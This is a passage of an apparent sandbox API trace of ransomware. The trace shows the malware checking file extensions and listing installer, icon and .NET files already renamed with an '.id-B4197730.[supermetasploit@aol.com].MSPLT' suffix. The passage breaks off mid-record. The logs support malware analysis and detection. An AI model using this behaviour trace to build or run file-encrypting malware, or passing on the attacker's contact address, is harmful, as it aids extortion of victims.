-1 [0284.374] lstrlenW (lpString=".potx") returned 5 [0284.374] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0284.374] lstrlenW (lpString=".ppa") returned 4 [0284.374] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0284.374] lstrlenW (lpString=".ppam") returned 5 [0284.374] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0284.374] lstrlenW (lpString=".ppm") returned 4 [0284.374] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pps") returned 4 [0284.375] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".ppsm") returned 5 [0284.375] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0284.375] lstrlenW (lpString=".ppt") returned 4 [0284.375] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pptm") returned 5 [0284.375] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0284.375] lstrlenW (lpString=".pptx") returned 5 [0284.375] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0284.375] lstrlenW (lpString=".prn") returned 4 [0284.375] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".ps") returned 3 [0284.375] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0284.375] lstrlenW (lpString=".psb") returned 4 [0284.375] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".psd") returned 4 [0284.375] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pst") returned 4 [0284.375] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".ptx") returned 4 [0284.375] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pub") returned 4 [0284.375] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pwm") returned 4 [0284.375] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0284.375] lstrlenW (lpString=".pxr") returned 4 [0284.376] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0284.376] lstrlenW (lpString=".py") returned 3 [0284.376] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0284.376] lstrlenW (lpString=".qt") returned 3 [0284.376] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0284.376] lstrlenW (lpString=".r3d") returned 4 [0284.376] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0284.376] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c04bbad, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c04bbad, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c04bbad, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate1.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~1.MSP")) returned 1 [0284.376] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c071cfd, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c071cfd, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c071cfd, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate2.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~2.MSP")) returned 1 [0284.376] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4fd117, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate3.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~3.MSP")) returned 1 [0284.376] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c595da7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate4.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RODDC7~1.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5285f7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5285f7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c56fcb8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate5.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~4.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ceacc74, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate6.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROC0D7~1.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c595da7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c595da7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c5bbf52, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate7.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RO7226~1.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5bbf52, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5bbf52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d02a6ab, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Rotate8.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RO9AA5~1.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5bbf52, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5bbf52, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5cef92a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x564, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Save.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SAVEIC~1.MSP")) returned 1 [0284.377] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d2b2e6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d2b2e6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d371948, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9056, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Setup.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPI~1.MSP")) returned 1 [0284.378] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5cf1f4e3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5cf1f4e3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5cf4564f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="stop.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="STOPIC~1.MSP")) returned 1 [0284.378] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5cf4564f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5cf4564f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d3bddef, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SysReqMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SYSREQ~1.MSP")) returned 1 [0284.378] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d05094a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SysReqNotMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SYSREQ~2.MSP")) returned 1 [0284.378] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d076957, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WARNIC~1.MSP")) returned 1 [0284.378] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d02a6ab, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d02a6ab, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d076957, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WARNIC~1.MSP")) returned 0 [0284.378] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0284.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.379] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c67ac9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="header.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="HEADER~1.MSP")) returned 1 [0284.380] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x60b7becf, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xadd3953, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~2.MSP")) returned 1 [0284.380] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x5dfa99a7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x290310, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~1.MSP")) returned 1 [0284.381] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d3bddef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5d3bddef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5dcd4cff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x11c108, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Core_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~3.MSP")) returned 1 [0284.381] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x64cd8248, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d7, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NETFX_~4.MSP")) returned 1 [0284.381] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5dff5e21, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5dff5e21, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ef7853e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd5110, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Extended_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NE8255~1.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e0dacd5, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e0dacd5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e199931, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x79110, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="netfx_Extended_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="NE4215~1.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c6c7188, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x427a6, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="ParameterInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e5ebd2f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e5ebd2f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e611ecc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2d304, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="RGB9RAST_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RGB9RA~1.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e611ecc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e611ecc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5e637fc7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17304, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="RGB9Rast_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RGB9RA~2.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e637fc7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5e637fc7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6066aedf, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13236, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Setup.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPE~1.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6069103e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x6069103e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x60a24a0b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="SetupEngine.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPE~2.MSP")) returned 1 [0284.382] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6079cf3d, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x6079cf3d, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6163672f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4824a, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="SetupUi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~2.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4f9718, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x769a, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="SetupUi.xsd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~1.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x616d0b3c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x616d0b3c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6178dc76, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17854, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="SetupUtility.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPU~3.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c4d017e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c4d017e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c5285f7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xa174, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="SplashScreen.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SPLASH~1.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x616f53b4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x616f53b4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x61fbff66, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x23518, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sqmapi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SQMAPI~1.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c4fd117, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c4fd117, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c54a730, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x37fa, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Strings.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="STRING~1.MSP")) returned 1 [0284.383] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c54a730, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c54a730, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ce143ad, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x98e8, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c713442, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1977e, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="watermark.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WATERM~1.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x63ed653b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x5b5241, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~1.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x639068f1, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2d764e, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~2.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x646238f8, 